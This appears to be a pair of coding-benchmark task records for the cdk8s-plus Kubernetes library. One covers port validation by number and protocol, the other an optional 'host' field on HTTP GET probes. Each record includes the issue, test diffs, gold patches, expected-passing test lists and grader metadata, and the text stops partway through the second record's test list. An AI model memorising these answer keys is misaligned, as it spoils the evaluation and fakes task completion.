**Title** Allow containers to expose the same port number when using different protocols **Problem** Container port validation incorrectly treated any reuse of a port number as a conflict, even when the protocols differed. This prevented legitimate configurations such as exposing TCP and UDP on the same port. **Root Cause** The uniqueness check considered only the numeric port value and ignored the associated protocol. **Fix / Expected Behavior** - Validate port uniqueness based on the combination of number **and** protocol. - Permit adding ports with identical numbers as long as their protocols differ. - Continue to reject ports that duplicate an existing name. - Continue to reject ports that duplicate both number and protocol. - Update error messages to reflect the combined number/protocol context. **Risk & Validation** - Ensure existing configurations that rely on the original validation still fail when truly duplicate. - Add or update tests to cover scenarios with same number/different protocol and duplicate protocol cases. - Verify that default protocol handling (TCP) remains consistent.
3,989
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index 331b6fd5..eccb9ba7 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -180,23 +180,56 @@ describe('EnvValue', () => { describe('Container', () => { - test('cannot configure identical ports at instantiation', () => { + test('cannot configure identical ports and protocols at instantiation', () => { expect(() => new kplus.Container({ image: 'image', ports: [ { number: 8080, + protocol: kplus.Protocol.TCP, }, { number: 8080, + protocol: kplus.Protocol.TCP, }, ], - })).toThrowError('Port with number 8080 already exists'); + })).toThrowError('Port with number 8080 and protocol TCP already exists'); }); - test('cannot add an already existing port number', () => { + test('can configure identical ports with different protocols at instantiation', () => { + const container = new kplus.Container({ + image: 'image', + ports: [ + { + number: 8080, + protocol: kplus.Protocol.TCP, + }, + { + number: 8080, + protocol: kplus.Protocol.UDP, + }, + ], + }); + + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); + }); + + test('cannot add an already existing port number with identical protocol', () => { const container = new kplus.Container({ image: 'image', @@ -205,8 +238,38 @@ describe('Container', () => { }], }); - expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 already exists'); + expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 and protocol TCP already exists'); + + }); + + test('can add an already existing port number with a different protocol', () => { + + const container = new kplus.Container({ + image: 'image', + ports: [{ + number: 8080, + protocol: kplus.Protocol.TCP, + }], + }); + container.addPort({ + number: 8080, + protocol: kplus.Protocol.UDP, + }); + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); }); test('cannot add an already existing port name', () => {
[ "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "default configuration", "custom configuration", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "defaults", "custom", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "can select namespaces", "can select all namespaces", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Container.addPort(port: ContainerPort) Location: src/container.ts (class Container) Inputs: `port` – object with mandatory `number: number` and optional `protocol?: Protocol` (defaults to `Protocol.TCP`). Outputs: `void`; throws `Error` with message “Port with number {number} and protocol {protocol} already exists” if a port with the same number **and** protocol is already present. Description: Adds a new port to the container while ensuring that the combination of port number and protocol is unique. Function: new kplus.Container(props: ContainerProps) Location: src/container.ts (class Container constructor) Inputs: `props` – object containing at least `image: string` and optional `ports?: ContainerPort[]`; each `ContainerPort` has `number: number` and optional `protocol?: Protocol`. Outputs: `Container` instance; throws `Error` with message “Port with number {number} and protocol {protocol} already exists” if the supplied `ports` array contains duplicate number‑protocol pairs. Description: Constructs a Container with the specified image and ports, validating that no two ports share both the same number and protocol. Method: Container._toKube() Location: src/container.ts (internal helper used in tests) Inputs: none. Outputs: object representing the Kubernetes container spec; its `ports` field is an array of `{ containerPort: number, protocol: string }` reflecting the container’s configured ports. Description: Serialises the Container into the low‑level Kubernetes manifest format, exposing the effective port list for verification in tests. Property: Container.ports (getter) Location: src/container.ts (class Container) Inputs: none. Outputs: `ContainerPort[]` – the list of ports as configured on the container, each entry containing `number` and `protocol` (defaulting to `Protocol.TCP` when omitted). Description: Returns the current set of ports defined for the container, preserving the number‑protocol pairing semantics.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.86, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3508", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug", "edge_case_bug" ], "reason": null, "reasoning": "The issue merely references a backport PR without describing the desired change, leaving the expected behavior (allowing same port number with different protocols and updated error messages) implicit. The test suite defines these expectations, but the issue text does not, making the specification ambiguous. This mismatch signals an ambiguous spec (B4) rather than a clearly solvable problem (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests assert specific error message strings that are not described in the issue text", "Tests expect new behavior (allowing same port number with different protocols) not explicitly stated" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ad442c7d4ed5dc6cde827d29ec9b350a22fdb665
2024-04-18 07:16:07
cdk8s-team__cdk8s-plus-4042
diff --git a/src/_action.ts b/src/_action.ts index a1c7bc6c..40bb8d88 100644 --- a/src/_action.ts +++ b/src/_action.ts @@ -21,11 +21,16 @@ export class Action { return { command }; } - public static fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme } = { }): k8s.HttpGetAction { + public static fromHttpGet(container: Container, path: string, options: { + port?: number; + scheme?: ConnectionScheme; + host?: string; + } = {}): k8s.HttpGetAction { return { path, port: k8s.IntOrString.fromNumber(options.port ?? container.portNumber ?? 80), scheme: options.scheme ?? ConnectionScheme.HTTP, + host: options.host, }; } -} \ No newline at end of file +} diff --git a/src/probe.ts b/src/probe.ts index e10fc8e8..048e619c 100644 --- a/src/probe.ts +++ b/src/probe.ts @@ -85,6 +85,13 @@ export interface HttpGetProbeOptions extends ProbeOptions { * @default ConnectionScheme.HTTP */ readonly scheme?: ConnectionScheme; + + /** + * The host name to connect to on the container. + * + * @default - defaults to the pod IP + */ + readonly host?: string; } /**
feat(probe): add `host` property to HttpGet probes (#3818) # Backport This will backport the following commits from `k8s-29/main` to `k8s-27/main`: - [feat(probe): add `host` property to HttpGet probes (#3818)](https://github.com/cdk8s-team/cdk8s-plus/pull/3818) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add optional `host` field to HTTP GET probes **Problem** HTTP GET probes currently lack a way to specify a target host, forcing them to always use the pod IP. This limits scenarios where probes need to reach a named service or external endpoint. **Root Cause** The probe configuration and underlying HTTP GET action definitions omit a `host` attribute, preventing its exposure to users. **Fix / Expected Behavior** - Extend probe options to include an optional `host` property. - Propagate the `host` value to the generated HTTP GET action in the manifest. - Preserve existing behavior when `host` is not supplied (defaults to pod IP). - Update documentation/comments to describe the new option and its default semantics. **Risk & Validation** - Verify that existing probes continue to render unchanged when `host` is omitted. - Add tests to confirm that specifying `host` results in the correct field in the rendered Kubernetes manifest. - Ensure backward compatibility with clusters that may ignore the `host` field.
4,042
cdk8s-team/cdk8s-plus
diff --git a/test/probe.test.ts b/test/probe.test.ts index 17946ea5..8040b027 100644 --- a/test/probe.test.ts +++ b/test/probe.test.ts @@ -57,6 +57,7 @@ describe('fromHttpGet()', () => { periodSeconds: Duration.seconds(5), successThreshold: 3, timeoutSeconds: Duration.minutes(2), + host: '1.1.1.1', }); // THEN @@ -65,6 +66,7 @@ describe('fromHttpGet()', () => { path: '/hello', port: k8s.IntOrString.fromNumber(5555), scheme: 'HTTP', + host: '1.1.1.1', }, failureThreshold: 11, initialDelaySeconds: 60,
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "defaultChild", "default configuration", "custom configuration", "Can be isolated", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Can mutate metadata", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add 